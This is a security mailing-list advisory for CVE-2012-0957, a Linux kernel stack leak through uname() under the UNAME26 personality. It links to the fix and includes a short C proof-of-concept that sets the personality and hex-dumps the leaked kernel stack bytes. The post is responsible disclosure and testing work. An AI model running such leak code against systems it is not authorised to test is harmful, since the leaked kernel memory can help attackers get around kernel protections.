oss-sec mailing list archives

Linux kernel stack memory content leak via UNAME26

From: Kees Cook <keescook () chromium org>
Date: Tue, 9 Oct 2012 13:10:34 -0700

CVE-2012-0957

Calling uname() with the UNAME26 personality set allows a leak of kernel
stack contents.

Fix:

https://lkml.org/lkml/2012/10/9/550

PoC:


/* Test for UNAME26 personality uname kernel stack leak.
 * Copyright 2012, Kees Cook <keescook () chromium org>
 * License: GPLv3
 */
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <errno.h>
#include <unistd.h>
#include <sys/personality.h>
#include <sys/utsname.h>

#define UNAME26 0x0020000

int dump_uts(void)
{
        int i, leaked = 0;
        struct utsname buf = { };

        if (uname(&buf)) {
                perror("uname");
                exit(1);
        }
        printf("%s\n", buf.release);

        for (i = strlen(buf.release) + 1; i < sizeof(buf.release); i++) {
                unsigned char c = (unsigned char)buf.release[i];

                printf("%02x", c);
                if (c)
                        leaked = 1;
        }
        printf("\n");

        return leaked ? (i - (strlen(buf.release) + 1)) : 0;
}

int main(int ac, char **av)
{
        int leaked;

        leaked = dump_uts();
        if (leaked) {
                printf("Leaked %d bytes even without UNAME26!?\n", leaked);
                return 1;
        }


        if (personality(PER_LINUX | UNAME26) < 0) {
                perror("personality");
                exit(1);
        }

        leaked = dump_uts();
        if (leaked) {
                printf("Leaked %d bytes!\n", leaked);
                return 1;
        } else {
                printf("Seems safe.\n");
                return 0;
        }
}

-- 
Kees Cook
Chrome OS Security

Current thread:

Linux kernel stack memory content leak via UNAME26 Kees Cook (Oct 09)